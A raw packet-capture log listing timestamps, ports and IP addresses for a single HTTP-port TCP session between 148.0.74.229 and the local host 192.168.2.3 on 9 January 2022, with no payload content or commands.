Jan 9, 2022 18:48:29.081409931 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.081613064 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.082297087 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.082334995 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.082374096 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.082412958 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.082427025 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.082649946 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.083415985 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.083456993 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.083493948 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.083532095 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.083569050 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.083570957 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.083581924 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.084266901 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.084309101 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.084316015 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.084347010 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.084387064 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.084397078 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.084428072 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.084476948 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.085279942 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.085319996 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.085359097 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.085396051 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.085411072 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.086345911 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.086388111 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.086409092 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.086426020 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.086426973 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.086467028 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.086504936 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.086519957 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.087256908 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.087297916 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.087312937 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.087337971 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.087377071 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.087392092 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.088325977 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.088387966 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.140523911 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.142477989 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.142570972 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.242536068 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.242600918 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.242643118 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.242654085 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.242682934 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.242728949 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.243501902 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.243544102 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.243582964 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.243599892 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.243622065 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.243662119 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.243669987 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.244579077 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.244616985 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.244632959 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.244657040 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.244695902 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.244702101 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.244734049 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.244786024 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.245517969 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.245560884 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.245599985 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.245614052 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.245637894 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.245676994 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.245687008 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.246481895 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.246521950 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.246536970 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.246562958 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.246603012 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.246614933 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.247260094 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.247311115 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.247380972 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.247425079 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.247459888 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.247473955 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.247500896 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.247551918 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.248419046 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.248460054 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.248498917 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.248512983 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.248538971 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.248588085 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.249562025 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.249602079 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.249639034 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.249654055 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.249677896 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.249718904 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.249727011 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.250473022 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.250514030 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.250530005 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.250552893 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.250591040 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.250603914 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.250631094 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.250682116 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.251271009 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.251312971 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.251348972 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.251370907 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.251390934 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.251430035 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.251458883 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.306493998 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.306556940 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.306588888 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.306658030 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.306698084 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.307292938 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.406538010 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.406599045 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.406631947 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.406639099 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.406704903 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.407305002 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.407346010 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.407386065 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.407413960 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.407495022 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.407537937 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.407547951 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.408281088 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.408345938 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.408390999 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.408432961 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.408459902 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.408471107 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.408473969 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.408509970 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.408555984 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.409284115 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.409322977 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.409374952 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.409440041 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.409480095 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.409519911 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.409535885 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.410285950 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.410343885 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.410398960 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.410439968 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.410480022 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.410485983 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.410518885 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.410563946 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.411312103 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.411354065 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.411390066 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.411417007 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.411586046 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.411638975 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.412267923 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.412380934 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.412420988 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.412435055 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.412458897 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.412522078 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.413285971 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.413327932 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.413366079 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.413383007 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.413454056 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.413494110 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.413508892 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.414319992 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.414360046 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.414388895 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.414397955 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.414438009 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.414453030 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.414479017 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.414531946 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.415293932 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.415335894 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.415371895 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.415395975 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.415410995 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.415451050 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.415462971 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.416541100 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.416583061 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.416604996 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.416621923 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.416661024 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.416676044 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.416702032 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.416749954 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.417316914 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.417357922 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.417397976 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.417412996 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.417437077 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.417484999 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.418323040 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.418364048 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.418401957 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.418438911 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.418440104 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.418478966 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.418488026 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.419286966 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.419342041 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.419392109 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.419431925 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.419470072 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.419482946 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.419509888 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.419559956 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.420315981 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.420355082 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.420392036 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.420407057 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.420430899 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.420471907 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.420480013 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.423418999 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.470532894 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.470596075 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.470635891 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.470640898 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.470685959 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.471313953 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.570590973 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.570651054 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.570691109 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.570698977 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.570738077 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.570769072 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.570776939 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.570863962 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.571377039 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.571419001 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.571455002 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.571495056 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.571527004 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.571535110 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.571594000 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.572338104 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.572380066 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.572417021 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.572422028 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.572455883 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.572496891 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.573384047 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.573424101 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.573462009 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.573471069 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.573501110 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.573544979 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.573575020 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.573649883 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.575381994 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.575423002 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.575460911 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.575500011 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.575516939 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.575541973 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.575572968 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.575582027 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.575623989 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.575661898 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.575695038 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.575701952 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.575742006 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.575803995 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.575859070 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.576999903 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.577044010 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.577084064 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.577114105 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.577121973 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.577162981 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.577193022 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.577373981 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.577415943 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.577455044 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.577466965 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.577495098 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.577513933 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.578974962 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.579014063 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.579055071 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.579061985 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.579094887 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.579119921 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.579124928 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.579222918 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.579296112 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.579363108 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.579401970 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.579438925 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.579457045 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.579478979 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.579515934 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.581341028 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.581382036 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.581418991 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.581434011 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.581459045 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.581500053 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.581513882 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.581537962 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.581578970 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.581594944 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.581619024 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.581636906 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.581659079 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.581736088 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.582355022 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.582396030 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.582433939 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.582473993 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.582513094 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.582520008 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.582607031 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.583331108 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.583370924 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.583409071 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.583415031 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.583447933 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.583472967 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.583489895 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.583611012 CET	49845	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:29.584328890 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.584367990 CET	80	49845	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:29.584407091 CET	80	49845	148.0.74.229	192.168.2.3
